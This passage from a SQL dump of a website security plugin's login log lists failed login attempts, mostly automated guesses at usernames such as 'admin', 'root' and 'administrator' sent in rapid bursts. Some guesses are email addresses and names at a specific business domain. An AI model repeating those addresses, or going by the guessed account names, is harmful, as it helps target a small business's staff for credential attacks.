Firefox/62.0'),(5874,8804,1629858970.646108,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5875,8806,1629859763.164927,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5876,8807,1629860129.794797,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5877,8809,1629861034.738324,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5878,8810,1629861341.532154,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5879,8812,1629862560.296510,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5880,8814,1629863385.625618,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5881,8815,1629863788.332420,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h+�5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5882,8816,1629864191.771760,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���:�L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5883,8817,1629865043.407116,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5884,8824,1629867717.240770,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5885,8825,1629867970.180618,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5886,8826,1629868191.092252,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5887,8827,1629868428.348211,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5888,8828,1629868624.148148,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^Vc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5889,8829,1629868831.769040,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5890,8830,1629869053.578886,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5891,8831,1629869268.232641,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5892,8832,1629869488.931571,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5893,8833,1629870996.762937,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ge��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5894,8834,1629871217.488739,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Xc�/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5895,8835,1629871418.371472,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5896,8836,1629871647.545036,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����K�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5897,8837,1629871798.295505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��o]5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5898,8838,1629872025.020660,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5899,8839,1629872222.415417,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5900,8840,1629872412.893842,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5901,8841,1629872625.427193,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5902,8842,1629872818.938105,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5903,8843,1629873000.001466,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5904,8844,1629873228.882173,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���-�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5905,8845,1629873436.567581,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��->�o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5906,8845,1629873436.597700,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��->�o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5907,8846,1629873633.051240,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5908,8847,1629873850.310549,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��|��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5909,8849,1629874262.050960,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����I','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5910,8850,1629874468.638103,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5911,8850,1629874468.665708,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5912,8851,1629874660.802822,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5913,8852,1629874849.652925,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5914,8853,1629875039.494062,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>�q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5915,8859,1629876290.577592,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5916,8861,1629876720.947329,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��[ͯ#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5917,8862,1629876949.775317,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5918,8864,1629877368.255244,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5919,8869,1629878568.610729,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5920,8872,1629879269.001719,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5921,8874,1629879779.161654,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5922,8876,1629880280.427205,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5923,8877,1629880504.054741,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/p�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5924,8886,1629882848.837785,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5925,8887,1629883371.647642,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5926,8890,1629884160.237444,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5927,8891,1629884454.472643,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��{+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5928,8898,1629886839.363797,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5929,8905,1629888850.992155,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5930,8905,1629888851.067431,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5931,8907,1629889440.582890,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5932,8908,1629889733.242746,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5933,8909,1629890022.634106,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5934,8913,1629891129.603795,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5935,8915,1629891723.928992,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5936,8918,1629892644.013391,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5937,8919,1629892913.928802,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/aP3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5938,8920,1629893252.358507,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���KG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5939,8921,1629893880.842374,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5940,8922,1629894174.801563,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@wP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5941,8923,1629894841.244138,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5942,8926,1629895765.011894,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5943,8927,1629896060.880353,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5944,8928,1629896399.765781,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g��E','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5945,8929,1629896739.947923,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5946,8930,1629897064.390941,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5947,8930,1629897064.420687,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5948,8931,1629897355.897102,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ν4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5949,8932,1629897712.054414,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��;u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5950,8937,1629899322.088598,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5951,8938,1629899659.305086,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5952,8939,1629899983.555620,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5953,8941,1629900615.219058,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5954,8942,1629900976.461397,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5955,8943,1629901287.301744,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5956,8943,1629901287.327369,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5957,8944,1629901600.843324,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/jɆ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5958,8944,1629901600.891421,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/jɆ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5959,8945,1629901956.490676,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5960,8945,1629901956.563587,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5961,8947,1629902608.267426,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5962,8949,1629905170.250833,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5963,8953,1629912601.203566,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5964,8954,1629912601.491853,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5965,8955,1629912602.105246,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5966,8956,1629912602.523357,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5967,8957,1629912602.864464,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5968,8958,1629912603.087122,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5969,8959,1629912603.324105,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5970,8960,1629912603.624182,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5971,8961,1629912603.968703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5972,8962,1629912604.236879,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5973,8963,1629912604.576699,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5974,8964,1629912604.932260,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5975,8965,1629912605.211378,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5976,8965,1629912605.240759,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5977,8966,1629912605.509838,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5978,8966,1629912605.528034,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5979,8967,1629912605.851552,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5980,8968,1629912606.153583,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5981,8968,1629912606.163188,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(5982,8972,1629914230.029446,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5983,8999,1629991644.349217,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��g�db','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(5984,9001,1630017546.165823,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5985,9002,1630017554.319978,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5986,9003,1630017561.737341,1,'loginFailInvalidUsername','twitter',0,'\0\0\0\0\0\0\0\0\0\0��PlD8','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5987,9004,1630017566.807074,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��PlD8','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5988,9005,1630017571.287567,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��PlD8','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5989,9006,1630017577.555117,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��|4�*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5990,9007,1630017585.887960,1,'loginFailInvalidUsername','twitter@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��|4�*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5991,9008,1630017591.592143,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��|4�*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5992,9009,1630017596.153553,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��|4�*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(5993,9012,1630044460.325220,1,'loginFailInvalidUsername','helen',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5994,9013,1630044462.055807,1,'loginFailInvalidUsername','helen@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5995,9014,1630044464.104798,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5996,9015,1630044465.962586,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(5997,9016,1630044467.636044,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��j��','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 